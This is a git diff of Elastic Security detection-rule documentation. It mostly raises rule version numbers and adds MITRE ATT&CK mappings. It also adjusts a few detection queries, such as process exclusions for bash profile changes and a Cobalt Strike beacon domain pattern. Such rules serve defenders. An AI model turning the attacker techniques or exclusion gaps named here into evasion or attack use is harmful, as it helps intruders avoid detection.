a/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc @@ -33,7 +33,7 @@ Identifies attempts to disable or schedule the deletion of an AWS KMS Customer M * Use Case: Log Auditing * Tactic: Impact -*Version*: 4 +*Version*: 105 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-management-console-brute-force-of-root-user-identity.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-management-console-brute-force-of-root-user-identity.asciidoc index 0f930f6f7d..8a8ac426f6 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-management-console-brute-force-of-root-user-identity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-management-console-brute-force-of-root-user-identity.asciidoc @@ -32,7 +32,7 @@ Identifies a high number of failed authentication attempts to the AWS management * Use Case: Identity and Access Audit * Tactic: Credential Access -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-management-console-root-login.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-management-console-root-login.asciidoc index 8175d383f1..6f0010ac85 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-management-console-root-login.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-management-console-root-login.asciidoc @@ -33,7 +33,7 @@ Identifies a successful login to the AWS Management Console by the Root user. * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-cluster-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-cluster-creation.asciidoc index 60f38604bd..e5429685a2 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-cluster-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-cluster-creation.asciidoc @@ -35,7 +35,7 @@ Identifies the creation of a new Amazon Relational Database Service (RDS) Aurora * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-cluster-stoppage.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-cluster-stoppage.asciidoc index 748e8ef3e4..021a3d5159 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-cluster-stoppage.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-cluster-stoppage.asciidoc @@ -35,7 +35,7 @@ Identifies that an Amazon Relational Database Service (RDS) cluster or instance * Use Case: Asset Visibility * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-creation.asciidoc index 685bf834fd..73759b3ba2 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-creation.asciidoc @@ -32,7 +32,7 @@ Identifies the creation of an Amazon Relational Database Service (RDS) Aurora da * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-creation.asciidoc index 41c605b8d8..2d661d926c 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-creation.asciidoc @@ -31,7 +31,7 @@ Identifies the creation of an Amazon Relational Database Service (RDS) Security * Data Source: Amazon Web Services * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-deletion.asciidoc index a3c16f6bea..fb99882493 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-deletion.asciidoc @@ -31,7 +31,7 @@ Identifies the deletion of an Amazon Relational Database Service (RDS) Security * Data Source: Amazon Web Services * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-export.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-export.asciidoc index 6faea6a6fc..5e7d339bab 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-export.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-export.asciidoc @@ -32,7 +32,7 @@ Identifies the export of an Amazon Relational Database Service (RDS) Aurora data * Use Case: Asset Visibility * Tactic: Exfiltration -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-restored.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-restored.asciidoc index bf15e6b68f..bcdbc4d9a5 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-restored.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-restored.asciidoc @@ -33,7 +33,7 @@ Identifies when an attempt was made to restore an RDS Snapshot. Snapshots are so * Use Case: Asset Visibility * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-redshift-cluster-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-redshift-cluster-creation.asciidoc index 28c8db9e87..4a0264c25c 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-redshift-cluster-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-redshift-cluster-creation.asciidoc @@ -32,7 +32,7 @@ Identifies the creation of an Amazon Redshift cluster. Unexpected creation of th * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-root-login-without-mfa.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-root-login-without-mfa.asciidoc index 05a9f99231..94620b3416 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-root-login-without-mfa.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-root-login-without-mfa.asciidoc @@ -33,7 +33,7 @@ Identifies attempts to login to AWS as the root user without using multi-factor * Resources: Investigation Guide * Tactic: Privilege Escalation -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transfer-lock-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transfer-lock-disabled.asciidoc index 8d2ff368cd..fe87560f89 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transfer-lock-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transfer-lock-disabled.asciidoc @@ -33,7 +33,7 @@ Identifies when a transfer lock was removed from a Route 53 domain. It is recomm * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transferred-to-another-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transferred-to-another-account.asciidoc index 90eb2b3d79..751ab4cdff 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transferred-to-another-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transferred-to-another-account.asciidoc @@ -32,7 +32,7 @@ Identifies when a request has been made to transfer a Route 53 domain to another * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route-table-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route-table-created.asciidoc index 573791dea4..aba024afba 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route-table-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-route-table-created.asciidoc @@ -34,7 +34,7 @@ Identifies when an AWS Route Table has been created. * Use Case: Network Security Monitoring * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route-table-modified-or-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route-table-modified-or-deleted.asciidoc index 5dbae6dde9..3d20fc1c68 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route-table-modified-or-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-route-table-modified-or-deleted.asciidoc @@ -38,7 +38,7 @@ Identifies when an AWS Route Table has been modified or deleted. * Use Case: Network Security Monitoring * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route53-private-hosted-zone-associated-with-a-vpc.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route53-private-hosted-zone-associated-with-a-vpc.asciidoc index b0bb4f6ec6..3a9b8bbdd2 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route53-private-hosted-zone-associated-with-a-vpc.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-route53-private-hosted-zone-associated-with-a-vpc.asciidoc @@ -32,7 +32,7 @@ Identifies when a Route53 private hosted zone has been associated with VPC. * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc index 7f205c231c..b84acc6666 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc @@ -36,7 +36,7 @@ Identifies the deletion of various Amazon Simple Storage Service (S3) bucket con * Use Case: Asset Visibility * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-saml-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-saml-activity.asciidoc index 0c8e783d8b..99a1c887fd 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-saml-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-saml-activity.asciidoc @@ -33,7 +33,7 @@ Identifies when SAML activity has occurred in AWS. An adversary could manipulate * Use Case: Identity and Access Audit * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-security-group-configuration-change-detection.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-security-group-configuration-change-detection.asciidoc index 7d6839ced9..d357739fca 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-security-group-configuration-change-detection.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-security-group-configuration-change-detection.asciidoc @@ -32,7 +32,7 @@ Identifies a change to an AWS Security Group Configuration. A security group is * Use Case: Network Security Monitoring * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-security-token-service-sts-assumerole-usage.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-security-token-service-sts-assumerole-usage.asciidoc index 2437db4e26..cfad4bcd1d 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-security-token-service-sts-assumerole-usage.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-security-token-service-sts-assumerole-usage.asciidoc @@ -32,7 +32,7 @@ Identifies the use of AssumeRole. AssumeRole returns a set of temporary security * Use Case: Identity and Access Audit * Tactic: Privilege Escalation -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-sts-getsessiontoken-abuse.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-sts-getsessiontoken-abuse.asciidoc index 20806de094..13932b6d0c 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-sts-getsessiontoken-abuse.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-sts-getsessiontoken-abuse.asciidoc @@ -32,7 +32,7 @@ Identifies the suspicious use of GetSessionToken. Tokens could be created and us * Use Case: Identity and Access Audit * Tactic: Privilege Escalation -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc index 77709b91ce..eee7ed7680 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc @@ -34,7 +34,7 @@ Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (E * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc index efb280ad02..fa1b60867c 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc @@ -33,7 +33,7 @@ Identifies the deletion of a specified AWS Web Application Firewall (WAF) access * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc index 44128a0e26..d780f96e5e 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc @@ -33,7 +33,7 @@ Identifies the deletion of a specified AWS Web Application Firewall (WAF) rule o * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/base16-or-base32-encoding-decoding-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/base16-or-base32-encoding-decoding-activity.asciidoc index 448a358b76..32a8f79014 100644 --- a/docs/detections/prebuilt-rules/rule-details/base16-or-base32-encoding-decoding-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/base16-or-base32-encoding-decoding-activity.asciidoc @@ -32,7 +32,7 @@ Adversaries may encode/decode data in an attempt to evade detection by host- or * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/bash-shell-profile-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/bash-shell-profile-modification.asciidoc index b8f1d229a9..458145c2bd 100644 --- a/docs/detections/prebuilt-rules/rule-details/bash-shell-profile-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/bash-shell-profile-modification.asciidoc @@ -33,7 +33,7 @@ Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are * Tactic: Persistence * Data Source: Elastic Defend -*Version*: 103 +*Version*: 104 *Rule authors*: @@ -48,20 +48,10 @@ Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are [source, js] ---------------------------------- event.category:file and event.type:change and - process.name:(* and not (sudo or - vim or - zsh or - env or - nano or - bash or - Terminal or - xpcproxy or - login or - cat or - cp or - launchctl or - java)) and - not process.executable:(/Applications/* or /private/var/folders/* or /usr/local/*) and + process.name:(* and not (sudo or vim or zsh or env or nano or bash or Terminal or xpcproxy or login or cat or cp or + launchctl or java or dnf or tailwatchd or ldconfig or yum or semodule or cpanellogd or dockerd or authselect or chmod or + dnf-automatic or git or dpkg or platform-python)) and + not process.executable:(/Applications/* or /private/var/folders/* or /usr/local/* or /opt/saltstack/salt/bin/*) and file.path:(/private/etc/rc.local or /etc/rc.local or /home/*/.profile or diff --git a/docs/detections/prebuilt-rules/rule-details/binary-content-copy-via-cmd-exe.asciidoc b/docs/detections/prebuilt-rules/rule-details/binary-content-copy-via-cmd-exe.asciidoc index 6a330115d0..b779128258 100644 --- a/docs/detections/prebuilt-rules/rule-details/binary-content-copy-via-cmd-exe.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/binary-content-copy-via-cmd-exe.asciidoc @@ -27,10 +27,11 @@ Attackers may abuse cmd.exe commands to reassemble binary fragments into a malic * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -61,3 +62,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Deobfuscate/Decode Files or Information ** ID: T1140 ** Reference URL: https://attack.mitre.org/techniques/T1140/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/binary-executed-from-shared-memory-directory.asciidoc b/docs/detections/prebuilt-rules/rule-details/binary-executed-from-shared-memory-directory.asciidoc index 4053522fdb..c0ac08e57c 100644 --- a/docs/detections/prebuilt-rules/rule-details/binary-executed-from-shared-memory-directory.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/binary-executed-from-shared-memory-directory.asciidoc @@ -36,7 +36,7 @@ Identifies the execution of a binary by root in Linux shared memory directories: * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/bpf-filter-applied-using-tc.asciidoc b/docs/detections/prebuilt-rules/rule-details/bpf-filter-applied-using-tc.asciidoc index 75678dc495..4c1a05cdf8 100644 --- a/docs/detections/prebuilt-rules/rule-details/bpf-filter-applied-using-tc.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/bpf-filter-applied-using-tc.asciidoc @@ -35,7 +35,7 @@ Detects when the tc (transmission control) binary is utilized to set a BPF (Berk * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-event-viewer.asciidoc b/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-event-viewer.asciidoc index 017c9c8f1e..7e94f37c1b 100644 --- a/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-event-viewer.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-event-viewer.asciidoc @@ -30,11 +30,12 @@ Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -132,3 +133,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-sdclt.asciidoc b/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-sdclt.asciidoc index 1453893bb8..a7b5960b15 100644 --- a/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-sdclt.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/bypass-uac-via-sdclt.asciidoc @@ -29,6 +29,7 @@ Identifies User Account Control (UAC) bypass via sdclt.exe. Attackers bypass UAC * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Data Source: Elastic Defend *Version*: 1 @@ -77,3 +78,15 @@ sequence with maxspan=1m ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: MMC +** ID: T1218.014 +** Reference URL: https://attack.mitre.org/techniques/T1218/014/ diff --git a/docs/detections/prebuilt-rules/rule-details/chkconfig-service-add.asciidoc b/docs/detections/prebuilt-rules/rule-details/chkconfig-service-add.asciidoc index bda54b6b6a..5eccad1050 100644 --- a/docs/detections/prebuilt-rules/rule-details/chkconfig-service-add.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/chkconfig-service-add.asciidoc @@ -34,7 +34,7 @@ Detects the use of the chkconfig binary to manually add a service for management * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/clearing-windows-console-history.asciidoc b/docs/detections/prebuilt-rules/rule-details/clearing-windows-console-history.asciidoc index 8ce96631dd..53c7817148 100644 --- a/docs/detections/prebuilt-rules/rule-details/clearing-windows-console-history.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/clearing-windows-console-history.asciidoc @@ -34,11 +34,12 @@ Identifies when a user attempts to clear console history. An adversary may clear * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -111,3 +112,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Clear Command History ** ID: T1070.003 ** Reference URL: https://attack.mitre.org/techniques/T1070/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/clearing-windows-event-logs.asciidoc b/docs/detections/prebuilt-rules/rule-details/clearing-windows-event-logs.asciidoc index 25040d080a..5065b95472 100644 --- a/docs/detections/prebuilt-rules/rule-details/clearing-windows-event-logs.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/clearing-windows-event-logs.asciidoc @@ -34,7 +34,7 @@ Identifies attempts to clear or disable Windows event log stores using Windows w * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -114,3 +114,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Clear Windows Event Logs ** ID: T1070.001 ** Reference URL: https://attack.mitre.org/techniques/T1070/001/ +* Sub-technique: +** Name: Disable Windows Event Logging +** ID: T1562.002 +** Reference URL: https://attack.mitre.org/techniques/T1562/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc b/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc index 13b3438bc5..51031a227b 100644 --- a/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/cobalt-strike-command-and-control-beacon.asciidoc @@ -34,7 +34,7 @@ Cobalt Strike is a threat emulation platform commonly modified and used by adver * Tactic: Command and Control * Domain: Endpoint -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -58,9 +58,9 @@ This activity has been observed in FIN7 campaigns. [source, js] ---------------------------------- -((event.category: (network or network_traffic) and type: (tls or http)) - or event.dataset: (network_traffic.tls or network_traffic.http) -) and destination.domain:/[a-z]{3}.stage.[0-9]{8}\..*/ +((event.category: (network OR network_traffic) AND type: (tls OR http)) + OR event.dataset: (network_traffic.tls OR network_traffic.http) +) AND destination.domain:/[a-z]{3}.stage.[0-9]{8}\..*/ ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/code-signing-policy-modification-through-registry.asciidoc b/docs/detections/prebuilt-rules/rule-details/code-signing-policy-modification-through-registry.asciidoc index 671538a7fc..65a4f14022 100644 --- a/docs/detections/prebuilt-rules/rule-details/code-signing-policy-modification-through-registry.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/code-signing-policy-modification-through-registry.asciidoc @@ -34,7 +34,7 @@ Identifies attempts to disable/modify the code signing policy through the regist * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -126,3 +126,7 @@ registry where host.os.type == "windows" and event.type : ("creation", "change") ** Name: Code Signing Policy Modification ** ID: T1553.006 ** Reference URL: https://attack.mitre.org/techniques/T1553/006/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/command-execution-via-solarwinds-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/command-execution-via-solarwinds-process.asciidoc index 578096a652..42bf9f85b8 100644 --- a/docs/detections/prebuilt-rules/rule-details/command-execution-via-solarwinds-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/command-execution-via-solarwinds-process.asciidoc @@ -33,10 +33,11 @@ A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected. * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Initial Access * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -80,6 +81,14 @@ process.parent.name: ( ** Name: Command and Scripting Interpreter ** ID: T1059 ** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ * Tactic: ** Name: Initial Access ** ID: TA0001 diff --git a/docs/detections/prebuilt-rules/rule-details/command-shell-activity-started-via-rundll32.asciidoc b/docs/detections/prebuilt-rules/rule-details/command-shell-activity-started-via-rundll32.asciidoc index 243f72f8da..8af2e9a61d 100644 --- a/docs/detections/prebuilt-rules/rule-details/command-shell-activity-started-via-rundll32.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/command-shell-activity-started-via-rundll32.asciidoc @@ -31,10 +31,11 @@ Identifies command shell activity started via RunDLL32, which is commonly abused * Use Case: Threat Detection * Tactic: Execution * Tactic: Credential Access +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -91,3 +92,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Unsecured Credentials ** ID: T1552 ** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/component-object-model-hijacking.asciidoc b/docs/detections/prebuilt-rules/rule-details/component-object-model-hijacking.asciidoc index 7926d36566..18b27d882c 100644 --- a/docs/detections/prebuilt-rules/rule-details/component-object-model-hijacking.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/component-object-model-hijacking.asciidoc @@ -30,11 +30,13 @@ Identifies Component Object Model (COM) hijacking via registry modification. Adv * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Privilege Escalation * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -153,3 +155,23 @@ registry where host.os.type == "windows" and ** Name: Component Object Model Hijacking ** ID: T1546.015 ** Reference URL: https://attack.mitre.org/techniques/T1546/015/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Component Object Model Hijacking +** ID: T1546.015 +** Reference URL: https://attack.mitre.org/techniques/T1546/015/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/conhost-spawned-by-suspicious-parent-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/conhost-spawned-by-suspicious-parent-process.asciidoc index 757f113baa..be467c00d7 100644 --- 